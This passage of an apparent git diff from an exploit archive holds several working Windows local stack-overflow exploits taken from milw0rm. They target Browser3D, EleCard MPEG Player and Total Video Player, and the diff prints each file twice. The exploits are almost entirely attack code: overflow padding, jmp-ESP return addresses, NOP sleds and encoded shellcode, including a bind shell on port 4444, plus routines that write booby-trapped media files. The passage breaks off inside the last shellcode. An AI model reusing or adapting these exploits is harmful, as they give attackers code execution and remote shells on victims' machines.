+print "\n [X]*************************************************\n";
+print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*\n";
+print " [X]        Coded By AlpHaNiX                        *\n";
+print " [X]         From Null Area [NullArea.Net]           *\n";
+print " [X]**************************************************\n\n";
+
+print "[+] Exploiting.....\n" ;
+
+my $acc="\x41" x 300 ;
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
+http://metasploit.com
+my $shellcode =
+"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x5d".
+"\x7e\xf1\x8c\x83\xeb\xfc\xe2\xf4\xa1\x96\xb5\x8c\x5d\x7e\x7a\xc9".
+"\x61\xf5\x8d\x89\x25\x7f\x1e\x07\x12\x66\x7a\xd3\x7d\x7f\x1a\xc5".
+"\xd6\x4a\x7a\x8d\xb3\x4f\x31\x15\xf1\xfa\x31\xf8\x5a\xbf\x3b\x81".
+"\x5c\xbc\x1a\x78\x66\x2a\xd5\x88\x28\x9b\x7a\xd3\x79\x7f\x1a\xea".
+"\xd6\x72\xba\x07\x02\x62\xf0\x67\xd6\x62\x7a\x8d\xb6\xf7\xad\xa8".
+"\x59\xbd\xc0\x4c\x39\xf5\xb1\xbc\xd8\xbe\x89\x80\xd6\x3e\xfd\x07".
+"\x2d\x62\x5c\x07\x35\x76\x1a\x85\xd6\xfe\x41\x8c\x5d\x7e\x7a\xe4".
+"\x61\x21\xc0\x7a\x3d\x28\x78\x74\xde\xbe\x8a\xdc\x35\x8e\x7b\x88".
+"\x02\x16\x69\x72\xd7\x70\xa6\x73\xba\x1d\x90\xe0\x3e\x7e\xf1\x8c";
+my $ret ="\x1a\x0f\x46\x77"  ; #  jmp ESP in Windows VISTA
+my $nop ="\x90" x 20 ;# some lame nops lol
+my $exploit = $acc.$ret.$nop.$shellcode;
+print "[+] Creating Evil File" ;
+open($FILE, ">>$file") or die "Cannot open $file";
+print $FILE $exploit;
+close($FILE);
+print "\n[+] Please wait while creating $file";
+print "\n[+] $file has been created";
+
+# milw0rm.com [2009-01-22]
diff --git a/platforms/windows/local/7853.pl b/platforms/windows/local/7853.pl
index ed6214685..dc1d76195 100755
--- a/platforms/windows/local/7853.pl
+++ b/platforms/windows/local/7853.pl
@@ -1,94 +1,94 @@
-#!/usr/bin/perl
-# By ALpHaNiX
-# NullArea.Net
-# THanks
-#EAX 00000000
-#ECX 41414141
-#EDX 775A104D
-#EBX 00000000
-#ESP 0012C280
-#EBP 0012C2A0
-#ESI 00000000
-#EDI 00000000
-#EIP 41414141
-
-system("color 5");
-
-if (@ARGV != 1) { &help; exit(); }
-
-sub help(){
-       print "[X] Usage : ./exploit.pl filename \n";
-}
-
-{ $file = $ARGV[0]; }
-print "\n [X]*************************************************\n";
-print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
-print " [X]        Coded By AlpHaNiX                        *\n";
-print " [X]         From Null Area [NullArea.Net]           *\n";
-print " [X]**************************************************\n\n";
-
-print "[+] Exploiting.....\n" ;
-
-my $buff="http://"."\x41" x 969 ;
-my $nop ="\x90" x 6000 ;
-my $ret ="\xB3\x37\x8D\x6E"  ; #  JMP ESP In DDRAW.Dll In Windows
-Vista Ultimate English
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
-http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
-"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
-"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
-"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".
-"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".
-"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
-"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
-"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
-"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".
-"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
-"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".
-"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".
-"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
-"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".
-"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".
-"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".
-"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
-"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".
-"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".
-"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
-"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".
-"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".
-"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".
-"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".
-"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
-"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
-"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".
-"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".
-"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
-"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
-"\x4f\x4f\x42\x4d\x5a";
-
-my $exploit = $buff.$ret.$nop.$shellcode;
-print "[+] Creating Evil File" ;
-open(blah, ">>$file") or die "Cannot open $file";
-print blah $exploit;
-close(blah);
-print "\n[+] Please wait while creating $file";
-print "\n[+] $file has been created";
-
-# milw0rm.com [2009-01-25]
+#!/usr/bin/perl
+# By ALpHaNiX
+# NullArea.Net
+# THanks
+#EAX 00000000
+#ECX 41414141
+#EDX 775A104D
+#EBX 00000000
+#ESP 0012C280
+#EBP 0012C2A0
+#ESI 00000000
+#EDI 00000000
+#EIP 41414141
+
+system("color 5");
+
+if (@ARGV != 1) { &help; exit(); }
+
+sub help(){
+       print "[X] Usage : ./exploit.pl filename \n";
+}
+
+{ $file = $ARGV[0]; }
+print "\n [X]*************************************************\n";
+print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
+print " [X]        Coded By AlpHaNiX                        *\n";
+print " [X]         From Null Area [NullArea.Net]           *\n";
+print " [X]**************************************************\n\n";
+
+print "[+] Exploiting.....\n" ;
+
+my $buff="http://"."\x41" x 969 ;
+my $nop ="\x90" x 6000 ;
+my $ret ="\xB3\x37\x8D\x6E"  ; #  JMP ESP In DDRAW.Dll In Windows
+Vista Ultimate English
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
+http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
+"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58".
+"\x4e\x36\x46\x52\x46\x42\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x37".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58".
+"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x53\x4b\x58".
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c".
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x4a\x52\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x48\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48".
+"\x49\x38\x4e\x46\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d".
+"\x46\x36\x4b\x58\x43\x34\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x48".
+"\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
+"\x50\x38\x50\x54\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46".
+"\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x57".
+"\x44\x33\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
+"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x48\x45\x4e".
+"\x48\x56\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50".
+"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
+"\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x45\x43\x45\x43\x54".
+"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x41".
+"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x49\x4a\x46\x46\x4a".
+"\x4c\x41\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
+"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32".
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x45\x4f\x4f\x42\x4d".
+"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x35\x4f\x4f\x48\x4d".
+"\x42\x45\x46\x35\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
+"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x45".
+"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x56".
+"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x55\x49\x35\x49\x52\x4e\x4c".
+"\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x48\x44\x4e\x41\x33\x42\x4c".
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x54\x4e\x52".
+"\x43\x59\x4d\x58\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
+"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f".
+"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x35\x41\x45\x41\x45\x4c\x46".
+"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x55\x4e\x4f".
+"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
+"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
+"\x4f\x4f\x42\x4d\x5a";
+
+my $exploit = $buff.$ret.$nop.$shellcode;
+print "[+] Creating Evil File" ;
+open(blah, ">>$file") or die "Cannot open $file";
+print blah $exploit;
+close(blah);
+print "\n[+] Please wait while creating $file";
+print "\n[+] $file has been created";
+
+# milw0rm.com [2009-01-25]
diff --git a/platforms/windows/local/79.c b/platforms/windows/local/79.c
index 2ef30e766..8957867d8 100755
--- a/platforms/windows/local/79.c
+++ b/platforms/windows/local/79.c
@@ -146,6 +146,6 @@ SendMessage( hWndChild, WM_LBUTTONDBLCLK, MK_LBUTTON,
 (LPARAM)0x000a000a );
 
 return 0;
-}
-
-// milw0rm.com [2003-08-13]
+}
+
+// milw0rm.com [2003-08-13]
diff --git a/platforms/windows/local/7923.c b/platforms/windows/local/7923.c
index 7c3de3567..707468b28 100755
--- a/platforms/windows/local/7923.c
+++ b/platforms/windows/local/7923.c
@@ -1,137 +1,137 @@
-/*simo36.tvp-bof.c
-Authour : SimO-s0fT
-Home : www.exploiter-ma.com
-greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
-bahjawi danger khod nasi7a
- 
-
-
-EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-ECX 00004141
-EDX 00340608
-EBX 41414141
-ESP 0012BF44
-EBP 0012C160
-ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-EDI 41414141
-EIP 7C92B3FB ntdll.7C92B3FB
-
-
-
-*/
-
-
-#include<stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include<windows.h>
-
-#define OFFSET 549
-char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46"
-"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47"
-"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20"
-"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c";
-
-char scode1[]=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
-"\x4e\x46\x43\x36\x42\x50\x5a";
-
-char scode2[]=
-"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
-"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
-"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
-"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
-"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
-"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
-"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
-"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
-"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
-"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
-"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
-"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
-"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
-"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
-"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
-"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
-"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
-"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
-"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
-"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
-"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
-"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
-
-
-
-
-int main(int argc,char *argv[]){
-    FILE *openfile;
-    unsigned char *buffer;
-    unsigned int offset=0;
-    unsigned int RET=0x7c85d568;
-    int number=0;
-                 printf("*********************************************************\n");
-                 printf("Total Video Player local universal buffer overflow exploit\n");
-                 printf("Cded by SimO-s0fT(simo_at_exploiter-ma.com)");
-                 printf("greetz : to Allah \n");
-                 printf("this exploit is for my best friends : Sup3r-crystal & mr.5rab & Hack back\n");
-                 printf("***********************************************************\n");
-    scanf("%d",&number);
-    if((openfile=fopen(argv[1],"wb"))==NULL){
-                                            perror("connot opening .....!!\n");
-                                            exit(0);
-                                            }
-    switch(number){
-                   case 1: buffer = (unsigned char *) malloc (OFFSET+strlen(scode1)+sizeof(RET));
-                                            memset(buffer,0x90,OFFSET+strlen(scode1)+sizeof(RET));
-                                            offset=OFFSET;
-                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
-                                            offset+=sizeof(RET);
-                                            memcpy(buffer+offset,scode1,strlen(scode1));
-                                            offset+=strlen(scode1);
-                                            fputs(twacha,openfile);
-                                            fputs(buffer,openfile);
-                                            fclose(openfile);
-                                            printf("File created ....!\n"
-                                                         "open it with tvp\n");
-                                            break;
-                                            
-                   case 2: buffer = (unsigned char*) malloc(OFFSET+strlen(scode2)+sizeof(RET));
-                                            memset(buffer,0x90,OFFSET+strlen(scode2)+sizeof(RET));
-                                            offset = OFFSET;
-                                            memcpy(buffer+offset,&RET,sizeof(RET)-1);
-                                            offset+=sizeof(RET);
-                                            memcpy(buffer+offset,scode2,strlen(scode2));
-                                            offset=strlen(scode2);
-                                            fputs(twacha,openfile);
-                                            fputs(buffer,openfile);
-                                            fclose(openfile);
-                                            printf("File created ....!\n"
-                                                         "open it with tvp\n");
-                                            break;
-                   }
-                   
-    free(buffer);
-    return 0;
-} 
-
-// milw0rm.com [2009-01-29]
+/*simo36.tvp-bof.c
+Authour : SimO-s0fT
+Home : www.exploiter-ma.com
+greetz to : Allah , mr.5rab , Sup3r crystal , Hack Back , Al Alame , all arab4services.net and friends
+bahjawi danger khod nasi7a
+ 
+
+
+EAX 0034F928 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+ECX 00004141
+EDX 00340608
+EBX 41414141
+ESP 0012BF44
+EBP 0012C160
+ESI 0034F920 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+EDI 41414141
+EIP 7C92B3FB ntdll.7C92B3FB
+
+
+
+*/
+
+
+#include<stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include<windows.h>
+
+#define OFFSET 549
+char twacha[]="\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46"
+"\x3a\x33\x3a\x35\x30\x2c\x2d\x4d\x6f\x68\x61\x6d\x65\x64\x20\x47"
+"\x68\x61\x6e\x6e\x61\x6d\x20\x2d\x20\x44\x41\x4f\x55\x44\x49\x20"
+"\x34\x45\x56\x45\x52\x0d\x0a\x44\x3a\x5c";
+
+char scode1[]=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
+"\x4e\x46\x43\x36\x42\x50\x5a";
+
+char scode2[]=
+"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
+"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
+"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
+"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
+"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
